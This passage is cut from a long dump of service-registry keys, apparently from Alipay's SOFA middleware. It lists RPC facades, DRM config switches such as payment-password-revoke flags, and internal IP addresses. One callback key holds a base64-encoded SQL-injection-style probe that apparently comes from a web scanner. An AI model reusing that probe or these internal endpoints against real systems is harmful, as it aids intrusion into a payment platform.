y.superapi.common.core.client.AppInvokeService:1.0:quotationcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.antgroup.zmxy.zmepcustprod.facade.api.MscAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ap.apshopcenter.common.service.facade.PromotionRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gclearingcenter.facade.api.ProxyCurrencyAgreementQueryFacade:1.0:iclearingCenterCurrencyAgreementQuery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.FaAssetDirectTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ecoqltprod.biz.eco.service.EcoUserQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.biz.service.msgbroker.facade.FortuneAccountMsgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.177.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dataphin.pipeline.common.facade.core.pipeline.PipelineOpenService:1.0:dataphin-pipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundapplication:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.migratedrmhandler.bxOrderIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcardcenter.biz.card.ConsumeInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.177.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.240.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.meshyorg.com.service.integration.fcbuservice.OperatorFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfusion.myhome.service.facade.AppDataFacade:1.0:mcomment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainbankloan.facade.api.approval.ApprovalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.prodcenter.common.service.facade.query.api.contract.ProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.73.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.arater.common.service.facade.RateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-zcbsalescenter-cashing#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.framodel.core.service.FramodelMonitorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibabab.alscsalescrm.solution.leads.LeadsReceiveCallbackSpi:1.0:kbsales@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkTagListMoblieService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditint.facade.service.PcreditDelayRepayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcservcenter.client.RcClientInvoker:1.0:criskcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.zdal.ldc.tair.processmngTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodcore.service.api.rate.VerifyStandardRateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.gather.common.facade.core.service.GatherOpenService:1.0:dpgather@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.calculateIndexEstimate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insscenemarket.common.facade.InsMktTaskScheduleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.PublicCustomTopicFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.common.service.facade.backmanagement.WaterMarkManagementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.shortlink.MobileShortLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testgw.common.service.facade.shadowuser.usercreate.ShadowUserRegistService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.IPOFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.AuthSpi:1.0:authcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.96.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bizprodmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodswitch.biz.service.template.ServiceTemplate:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:aircoreservice@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSUSERCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.elastic.gfas.gfasShareDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.216.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.baitiaoprod:name=com.alipay.baitiaoprod.core.service.impl.DistributedLockServiceTairImpl.lockType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.25.250.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mytradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillFlowControlRegisterFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.YebsAftransService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imif.common.service.facade.v2.MerchantUpdateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA-SCHEDULER-S-S_autoinsprod_task_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.emcooperate.common.service.facade.ActiveServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@libracore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finpromobus.common.service.facade.config.MangroveConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.OperationConfigCallbackFacade:1.0:paygrowth_batchmarketing_strategy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmFlowConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:necbill@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.core.service.eco.EcoSysConfigInfoDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.isasp.service.facade.mock.AppAPIProcessorOnlineMock:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestTBaseCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.inner.MiniAppMemberInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanspacex.common.service.facade.service.PcloanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cfamlmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodswitch.biz.service.template.ServiceTemplate:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.202.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.prodtrans.senior.manage.facade.ProdtransRecoverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.framodel.common.service.facade.api.OssFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.tntInst.TntInstMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:CODE_REPOSITORY@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng_adjustAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.ParmDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.core.service.quality.MstQualityCtrlConfDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.common.service.client.promo.service.PromoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.prodmng.api.FundProductValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.bma.miniprogram.MiniProgramReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instsign.common.service.facade.instcontract.InstContractBusinessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopencore.common.service.facade.api.ArchDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.integration.chngservice.proto.query.OpsQueryService:1.0:hnbc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetSpuCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.biz.service.ops.OpsService:1.0:indexOpsService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yunfengdieweb:name=com.alipay.sla.businessroute.drm.BusinessRoutePolicy.grayRoutePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.api.AssetTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@dayutrprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_cacheAccountCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.126.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.service.facade.service.HttpInspectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.facade.drm.DrmContentLdcManger.supportLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsearch.common.service.facade.ShopSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelcenter.common.service.facade.meta.BizInfluenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ZDOMAIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inshealthprod.facade.CustomerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.MerchantAccountLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.common.sfs.ISensitiveFileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.common.service.facade.service.SelfCureStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:lifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-questionnairetwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.postman.MessageApiUcdpmngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.quality.ReplayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.basementweb.AlertProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.OpsActivitySubscribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.facade.orderlink.OrderLinkQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:sffgroup-ares#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:meshysale_MeshyUploadAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_1214#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pointcore.common.manage.facade.BudgetLibClearService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.facade.antha.AnthaActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finboss.common.service.facade.productx.FinProductxQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:pledgecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:midas@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.208.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.testmeshapp.facade.TestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:isdsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:publicDomain_agdsdatahub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfmreceipt.service.facade.api.FundAllocateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.cafetrace.CafeTraceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchorder.ordercenter.facade.service.OrderSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.custrelationCzoneTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicore.common.service.facade.client.api.ClientInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceCommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDynamicResource.recommandFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.baitiaoprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:fundscenebff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.asbi.AsbiIdentityTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementInconsistentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settleprod.service.facade.gcard.GCardDepositOrderQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aliyun.apsarabase.euler.config.service.facade.api.ConfigExprFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@dadeploymentunit#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.scardcenter.common.service.facade.CardModeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:sdarttool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.trsbrain.common.service.facade.service.SelfCureExecuteFacade:1.0:trsbrainCureExecute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbasset.common.service.facade.stuff.api.StuffStockQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.164.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.amlcloud.biz.analyze.manager.IAmlAnalyzeManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.contentlib.common.service.facade.account.ContentAppAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.checker.SensitiveCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ecocheck.common.service.investment.GreatPromotionInvestmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_S_PAYCORECHGTYPE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pvsofaserver:name=com.alipay.zcache.tbase.yingxutestTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acpartner.common.service.facade.RebateContractFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.common.service.assistinvestigate.core.RequireEncryptServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.isv.IsvFileReceiptNotifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue46:onelevel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.126.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.aldata.common.service.facade.api.OrgInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:imaspmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.null:name=com.antcloud.ifcidentitycloudus.biz.nac.drm.NacConfigDrmServiceImpl.noticeConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.filebridge.shared.cache.CacheRefresher:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.CustomPortfolioProductManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FINQA_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.oceanbase.obforumcore.service.competition.CompetitionFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.platform.xts.bacs.spi.AccountTransFinalizer:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.shop.MrchProdShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.CifClientDrmSwitch.fraudmng.clientDrmSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.243.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.baoxianprod.gift.facade.GiftInsurePolicySearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cxbiz.membersolution.common.service.facade.api.arrangement.ArrangementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.199.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:dtbank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.PrizeSendInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.comprehensive.insmobile.mobileDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.ps.user.UserContextFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ideploy.core.service.zcache.CacheManageComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.QcRetryWholeMissionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.biz.service.impl.rpc.PositionRecommendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.assess.audit.AssessAuditManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.logClientError,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.accustomercore.common.service.facade.UCKernelUserManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.physicaltransactionfund.refund.RefundPhysicalTransactionFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.33.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:apiTradeApprove@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.129.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_INSLIFEPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:eHl6J1x0T3JcdGFudHdlYnNjYW5zWVc1MD1PREF4TURJd05UTXRMVEV4TURBd01qQXlNZw==@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.ApiNotifyExtQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dchainconfigcenter.facade.notify.api.NotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acccenter.common.service.facade.system.OssServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmportal.common.service.facade.ExchangeVoucherManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.inner.service.process.ProcessInstanceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundprod.common.service.facade.UserActivityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.itemcore.common.service.facade.ItemCacheCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.217.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.hyp.common.service.facade.CheckInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbillingcore.common.service.facade.BackstageRestServiceForCustomerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.operate.openapi.client.ConsumeOperationInvokeService:1.0:pcreditintTradeTransferConsult@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.market.SocialItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.GlobalSwitcher.elasticRule,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.common.service.facade.api.manage.PacOfflineDepositInfoMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.alipay_dns_ds_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.resultwrap:name=com.alipay.chair.businessgray.drm.renderGray.renderOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.CifQueryParamSwitchConfig.profileTagsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.renderweb:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicreateweb.api.type:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:spcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amspm.ardd.common.support.api.FactorDataRepositoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rpc.foo.common.service.facade.RouteService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallba